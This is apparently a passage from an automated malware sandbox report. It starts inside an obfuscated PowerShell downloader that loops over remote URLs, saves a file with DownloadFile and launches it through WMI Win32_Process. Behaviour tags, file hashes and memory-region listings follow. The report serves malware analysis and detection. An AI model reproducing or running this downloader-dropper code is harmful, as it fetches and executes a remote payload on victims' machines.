 [ ] w ' + ' l ' ) + ' u ' + ( ' n a ' + ' b i t u ' ) + ( ' y ' + ' e l i k . ' + ' c o m ] ' ) + ' [ ' + '   ' + ' 1 ' + ( ( ' )   ' ) ) + ' j ' + ( ' j ' + ' k g S   ' ) + ' [ ] ' + '   ' + ' [ ] ' + ' w ' + ' w ' + ( ' p - ' + ' c o n t ' ) + ( ( ' e ' + ' n t ] [   1 )   j j k ' + ' g S ' ) ) + ( '   [ ' + ' ] ' ) + ( '   [ ] w f ' + ' W ' + ' d 0 ] ' + ' [   1 ' ) + ' ) ' + '   ' + ( ' j j ' + ' k g S ' + '   ' ) + ( ' [ ]   ' + ' [ ] w ' ) ) ) . " r E p L ` A C E " ( ( ( ( ( ' ] [   1 ' + ' )   j ' + ' j k g S ' ) ) + ( '   [ ' + ' ] ' ) + '   ' + ' [ ' + ' ] w ' ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x ' + ' w e ' ) ) [ 0 ] ) . " s P ` L i T " ( $ Z 4 n d v _ 5   +   $ U 8 4 t t 7 c   +   $ O 7 s v p n w ) ; $ U u h u s c f = ( ( ' R ' + ' q o d f ' ) + ' k 4 ' ) ; f o r e a c h   ( $ M i 5 q _ d o   i n   $ P g a t h r a ) { t r y { $ N u p r r m 8 . " D o ` w n ` L ` O A D f I L e " ( $ M i 5 q _ d o ,   $ Y u l h v p f ) ; $ Q t q u 6 h 5 = ( ' A ' + ' c ' + ( ' _ b ' + ' r t s ' ) ) ; I f   ( ( . ( ' G e ' + ' t - I t e m ' )   $ Y u l h v p f ) . " l E ` N G t h "   - g e   4 0 6 8 3 )   { ( [ w m i c l a s s ] ( ' w ' + ( ' i n 3 2 ' + ' _ ' ) + ( ' P r o c ' + ' e ' + ' s ' ) + ' s ' ) ) . " C R E a ` T e " ( $ Y u l h v p f ) ; $ C m o v w y 8 = ( ' F p ' + ( ' e w ' + ' 1 ' ) + ' w k ' ) ; b r e a k ; $ N 0 8 9 c u v = ( ' F ' + ( ' t q c e ' + ' z ' ) + ' f ' ) } } c a t c h { } } $ W t b 9 o p a = ( ' N ' + ( ' 9 ' + ' x 4 1 p l ' ) ) 1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exeC:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WPDSp\timeout.exe"C:\Windows\SysWOW64\WPDSp\timeout.exe"2⤵
- Executes dropped EXE
- Delays execution with timeout.exe
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exeMD5
3251f9c9a23d5979db7894ae67ba43c5
SHA146bc0900cd636574db1f8e8a4dd83475a130d1a5
SHA256277527cd5795b0441e835de542a3c8a7aa9f6c9a5b134b617d49088c0a0f8e99
SHA512600cb829a8e023499eab355babdff19ef9890d9808c834f895784b3fc175ba920e10a3e811fb839378fbfe8baf36d81d91c49309f17e2b740b915dd731164246
-
C:\Users\Admin\Dku9b1_\Aapn1vv\Avqv7t89l.exeMD5
3251f9c9a23d5979db7894ae67ba43c5
SHA146bc0900cd636574db1f8e8a4dd83475a130d1a5
SHA256277527cd5795b0441e835de542a3c8a7aa9f6c9a5b134b617d49088c0a0f8e99
SHA512600cb829a8e023499eab355babdff19ef9890d9808c834f895784b3fc175ba920e10a3e811fb839378fbfe8baf36d81d91c49309f17e2b740b915dd731164246
-
C:\Windows\SysWOW64\WPDSp\timeout.exeMD5
3251f9c9a23d5979db7894ae67ba43c5
SHA146bc0900cd636574db1f8e8a4dd83475a130d1a5
SHA256277527cd5795b0441e835de542a3c8a7aa9f6c9a5b134b617d49088c0a0f8e99
SHA512600cb829a8e023499eab355babdff19ef9890d9808c834f895784b3fc175ba920e10a3e811fb839378fbfe8baf36d81d91c49309f17e2b740b915dd731164246
-
memory/624-8-0x000000001AA70000-0x000000001AA71000-memory.dmpFilesize
4KB
-
memory/624-5-0x000000001AB90000-0x000000001AB91000-memory.dmpFilesize
4KB
-
memory/624-6-0x00000000023D0000-0x00000000023D1000-memory.dmpFilesize
4KB
-
memory/624-7-0x0000000002570000-0x0000000002571000-memory.dmpFilesize
4KB
-
memory/624-9-0x000000001B7C0000-0x000000001B7C1000-memory.dmpFilesize
4KB
-
memory/624-4-0x00000000021F0000-0x00000000021F1000-memory.dmpFilesize
4KB
-
memory/624-3-0x000007FEF5BE0000-0x000007FEF65CC000-memory.dmpFilesize
9.9MB
-
memory/756-1-0x0000000006250000-0x0000000006254000-memory.dmpFilesize
16KB
-
memory/756-0-0x0000000000577000-0x000000000057C000-memory.dmpFilesize
20KB
-
memory/756-2-0x000000000057C000-0x0000000000580000-memory.dmpFilesize
16KB
-
memory/896-18-0x0000000001EE0000-0x0000000001F22000-memory.dmpFilesize
264KB
-
memory/896-17-0x0000000001E60000-0x0000000001EA3000-memory.dmpFilesize
268KB
-
memory/896-15-0x0000000000000000-mapping.dmp
-
memory/1052-10-0x0000000000000000-mapping.dmp
-
memory/1708-13-0x00000000004C0000-0x0000000000502000-memory.dmpFilesize
264KB
-
memory/1708-12-0x0000000000470000-0x00000000004B3000-memory.dmpFilesize
268KB